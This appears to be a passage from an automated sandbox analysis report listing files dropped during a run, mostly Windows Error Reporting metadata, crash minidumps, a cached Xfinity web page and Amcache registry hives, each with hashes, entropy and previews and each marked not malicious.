Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB119.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8240
Entropy (8bit):	3.6895477595596304
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiPe67zB6Y6q6ngmfTzSKCprL89bLjsf4+5m:RrlsNi26J6YX6ngmfTzSuLIf4B
MD5:	D3FFD1D8D70A1A68F0C9EA9A8C76FB5F
SHA1:	78E54A155DAE18F6768EBDF2A3343D29A4FA71CD
SHA-256:	A4E64D8FDC3BA36EED6669F3FADAA1806229133DB7901EBD273E6928A3D93350
SHA-512:	0AAF3D061F82FE4BB7BEABE36A967527E30C4DFB1C0229696F5241F3AE30CD936E948B86D4DB4099C92CC41A048CBCBCF8A7B3CAB6647B752DE4695EB5C3E62B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB159.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.451239707467063
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjg8fm8M4JCdsNZFTQq+q8/MKV4SrSzd:uITf6YuEgrsqYJJHgqHKDWzd
MD5:	62C66B351B574D2CBFBB67B481A63B8F
SHA1:	CEE12EE81A9EE305CA89BBFC7A67D2733D67541E
SHA-256:	2D984FEC02C7B1048A48DAFCD9A82917FBDC2C5D916EC186271D5A545DFFB429
SHA-512:	7D32A7DFFD390D5763ED8D6436792BF138C852F5861E5DAB842F739F8CFBF06526CC486D208A2FB21554C50AC735CFD00A3355D7780393BBE017AA23755279F8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB188.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.4535457779439005
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9J1Wgc8sqYj/8fm8M4JCdsNZFvmE+q8/MKNQ4SrSod:uITf6YuEgrsqYIJH1HJDWod
MD5:	3437785D756624522B0240E8A2C39C9B
SHA1:	9CB9C7D318CEA29B39761E48F239709B44DB0760
SHA-256:	7CB093CB2B8468C817BB7A0F326D186B8972E8A4C30C6E3FC99B4DF17C8C06DA
SHA-512:	6CAEDBE89D80EBCE1D51AC0478464BCFDAF7FD2A4A1C7011AC4C70FE0D87B45141DAFFD31650F70B60825843C98F61C89E77935F5C3B8CAEB01EA10875632377
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:14 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	39450
Entropy (8bit):	2.1531100420995837
Encrypted:	false
SSDEEP:	192:wPOCZLCQHNwZl7O5SkbUiw++i3KDebKflAAUSZ2en:2neC5Lbi++CKDebqlSSp
MD5:	C5E17D29856DFC35767A676CF84016D6
SHA1:	2226CB71032CB6B11C1BF076DE5F3045A80AE422
SHA-256:	590DAC5484A34824E216529042441ABCA963BFBFB40584A32AB3B6644875EF39
SHA-512:	0B55FC781C91732FCF0990C834BC639FAD94C48EAE531DDFBC189A96270AFCB63FCB3D8B125DAAFC87509CB967421D8C3392A17E65148A3AC957C92BBA2A34CB
Malicious:	false
Preview:	MDMP....... .......b.wd............d...............l............)..........T.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T.......L...a.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC51E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8244
Entropy (8bit):	3.692276707994812
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiPI67zr6YkG6FPgmfTTSKCprt89bPFsfglm:RrlsNig6T6YV6NgmfTTSIPeff
MD5:	744E4FC73CE2424E1A7692483AD7E452
SHA1:	2A70A2BD8BB4667E5200C738BF7C9766670F66D9
SHA-256:	62F8466E1B7AD52F869F215C0F68F0F204BB0858F9E69B618782A28993F4E30D
SHA-512:	E9781E833BE3C4D3EC7CC0445EB6B7B67108A5A47E4AB33C691680C97C5C4916550703C83ADB807EB9AEEC0D5F4BCDBFBE3C9DDCDED0811AB905A94839E0974D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC58D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.453635537014888
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9J1Wgc8sqYje8fm8M4JCdsN9FS+q8/M8i4SrSUd:uITf6YuEgrsqY/JHaHrDWUd
MD5:	F6BF7F749FEBDF7C91074040214DEFC9
SHA1:	29C636DDD4AD7B9BE52883AA26BCEC0020DF7DC1
SHA-256:	F29EA7AF59CEE3A0646E241F9F44061472081D74250B449B50A9E6853F5FA691
SHA-512:	5A2CCCFB9A95EAA052E422D2346C21B594F581423F9E5F4AA61DA8AF347FF1273BBB6F7EEDFB619A3AD73E2BF202D9EA61C462ACBAF97BCBCE3027871420B7C7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1FE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:17 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	44710
Entropy (8bit):	2.079213774155661
Encrypted:	false
SSDEEP:	192:v86GYxeIO5Skb0vRqUElyt5MhtoiSLle//zHOX:iP5Lb0pqUEQwwiSsDOX
MD5:	F7A316A5DD606F44B34C9C2DFD37C52F
SHA1:	00FEF71008DB10C2A4C92E1953241FA55E211D6C
SHA-256:	D71279CDB337C4CFFB42D01D1933916E3E366A5CEC960810C46D61EC69DF1A51
SHA-512:	152E98F6101AFE73423F48A4973EF3FE7FCB8FDA37E74B51A02E5A9834A2243CA1679C9E667A24BAB3C8C235457BFC4D854B9DBBCDAAC8D3D0637E079EC6E347
Malicious:	false
Preview:	MDMP....... .......e.wd.........................................,..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......X...d.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD23D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:17 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	43190
Entropy (8bit):	2.121163250343507
Encrypted:	false
SSDEEP:	192:v6HSqGYOrTuO5SkbfP1n5I9j/14atXq/:/Rrl5Lbn9sj/qa8
MD5:	717039D5BED6AC2140741073F17C6955
SHA1:	742C0581B19062B5E1606620B0332CFAEEBA7768
SHA-256:	AC706A4DBD9A33019CE2FC951619C4F27F9043D3649DD93ED97C7394F9DE4D4E
SHA-512:	50480FE95DF6D48C472CB28C2FE39835C563512E7E01A6E73AFACDB16565AB8F3A7F53E38CC52BFD5AB626BDE16513C01C92B9FC3E47834364415A738662370E
Malicious:	false
Preview:	MDMP....... .......e.wd.........................................,..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......\|...d.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD338.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6919377532907744
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNigw6iut6YEQH6oVgmfTTSKCpr789bU3sf98m:RrlsNi36Z6YRH6oVgmfTTSeU8fz
MD5:	F693FBFF828EB8D926E85592657E9A86
SHA1:	3D25D9728FC1A237729E12971748454391FFC963
SHA-256:	09B556366919F789D2F702D19B90D6396AA229EC62E75EEFC2D84D1E1DCA3326
SHA-512:	18E824BB6682ED96431F7F599D1853A2ED31943F6816B45F744AED5A1E49BF19FFF03102FEA4A70C93CE6D063B1665F32FB487B79FF399A65AAF2218AAFCF007
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD368.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.450065698293171
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjL8fm8M4JCdsN9FyW+q8/M8PM4SrS9d:uITf6YuEgrsqYUJH6WH+MDW9d
MD5:	F64E5BE2DC72CF4776D0177799C38614
SHA1:	056F50C273A53C66900BFAB4953CB5D2B8830347
SHA-256:	699AD5A6DD693739E075E1A9E77EC43DB1F15142DF384848DFE3A7C6CF9DB4E9
SHA-512:	29FE514E25CC8CF512CCADE05C1E4D9659F59CFBD359DC1D15A138FAD6156697FD7ABE135438A1E0E5A51BF309C6A85498D391C88FB7C5909B71B1EE1A720DD7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD376.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6900503215815847
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiHo6K6YEQZ6oVgmfTzSKCprV89bjxsf9Bm:RrlsNiI6K6YRZ6oVgmfTzSAjqfS
MD5:	8D3AC99AEBAA386223D0BE0CCA333B3D
SHA1:	B0336139179E00A4EA682B03352756F9535B0104
SHA-256:	661224D073EC345AA4DFC54C81A3A124423BA4BA09034149F74DFC236F9E3E22
SHA-512:	FFFFCF19CE24725AE8E56A0A82EE9387FF5952964E92CB29C61358C16B1A3D54A011FCE34B5F45E71F192B07FACB0B3DD2475C6AC45E789F58BA9BFD412B8862
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3D5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.449631812720434
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjLs8fm8M4JCdsNZFur+q8/MKJJ4SrSchd:uITf6YuEgrsqYvRJHyrHUJDW4d
MD5:	118164DD345DD310D351B30EA875EB39
SHA1:	0933DC3A6B0A0AC57B6144CD17E96DF3CAF0169A
SHA-256:	A05EABFF7766F77A2C01E07AFD4DE41CFC6C97C2B9DB53D6C60C5594DDF63139
SHA-512:	85E0BF8EA0EC65EB91AD5A7F5EE50CC61F80AAF01654093BCF4A9FE540BE62C9FE3A177CCC4FB537D9040D390E97E6AC38B0B5EB190F70BF6FAF5E6C4CB290E3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\national[1].htm

Download File

Process:	C:\Windows\SysWOW64\wermgr.exe
File Type:	HTML document, ASCII text, with very long lines (65212)
Category:	dropped
Size (bytes):	149507
Entropy (8bit):	5.28662942755702
Encrypted:	false
SSDEEP:	3072:2DbDv9PpwZW+V6ssCcVwjhrTFJnZV12KfgxmyLjsfqW:EcgvW
MD5:	8AE3F8E84A72A4D14E4D04A25143D7F8
SHA1:	564305FB38FCDFB369082CDB94D568B6CDAA58F5
SHA-256:	C09BE827203DCD4DA4509396F5E38BBA16343CE9B2E3EF1770E8240F38ED0073
SHA-512:	27AECBF22B846427E74C00240DD0E140CCBF8FF67D5DB258327EBE3F469AE0F9190227BF924028F4F3E4F3A594644BA53ECCAB81FE6E62E32CB8852353A727E4
Malicious:	false
Preview:	<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><script>if (typeof window !== "undefined" && typeof window.process === "undefined") {. window.process = window.process \|\| { env: {} };. }</script><script type="env-config">{"clientId":"xfinity-learn-ui","sitecoreApiKey":"{1A57AE5E-AF7C-4A9E-803A-C756E3F23267}","sitecoreApiUrl":"https://jss.xfinity.com/","dictionaryKey":"{5FA0A82E-BBDB-4FBD-A3F4-9C5D07AA6E0E}","uniform":false,"oAuth":{"clientId":"shoplearn-web","endpoint":"https://oauth.xfinity.com"},"endpoints":{"ssmEnv":"https://api.sc.xfinity.com","aiQApiUrl":"https://aiq-prod.codebig2.net","errorRedirectUrl":"https://www.xfinity.com/learn/landing/sorry","cspApiUrl":"https://csp-prod.codebig2.net","dataLayerTimelineApiUrl":"https://bdl43tfhab.execute-api.us-east-1.amazonaws.com/prod/aiq-banner"},"environment":{"name":"PROD"},"appName":"xfinity-lea

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.344707996596824
Encrypted:	false
SSDEEP:	12288:M8odQ/1jG7/qSK5qm+YoORoAiqurRW8i75Y6wBVX63J3D+OIFDywD:zodQ/1jG7/qSK5q3s/
MD5:	8A4BF0040203A623B1F8AD75BC282CA7
SHA1:	5C33FDF440CCB695C145C73EE88EE00A522BE8DE
SHA-256:	B8BE5379A07E6D14486E1C642DFAB62E06FB6E6126AC1E61B28DC9F13D0A7250
SHA-512:	FA387441E97B12292A06FFADB5895D43F771F7DC8A97A7BFF76DEDC33D9507A4A9A01EC643FF555013DC77663DDBFE7AEEBFA5BE52C03BC2F2240C9104D50916
Malicious:	false
Preview:	regf[...[...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"..(.................................................................................................................................................................................................................................................................................................................................................V.u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.4598446705021955
Encrypted:	false
SSDEEP:	384:21pH5+XpnxSw4nhfude3eScNehhfude3eS+:6ZSMw4nhfR3eSuehhfR3eS
MD5:	CBEA7AD55871A2001B030B4E61C95537
SHA1:	24BE2836B59F39C05B9B3F836ABB38A6D91B3909
SHA-256:	30C323EE3A4854EF4E5943EFC29D158624C3E4F970970816BE546B3781827E4B
SHA-512:	6979C1F1AFD2AA862B01C9E94CD618F1AC7D953DC8B638219A227AC1DCE1C36B46A4A29F1B5F7A9BF5D18278EBF58D61C8F2FB52C2ECD4B6D9CEA49F0468526B
Malicious:	false
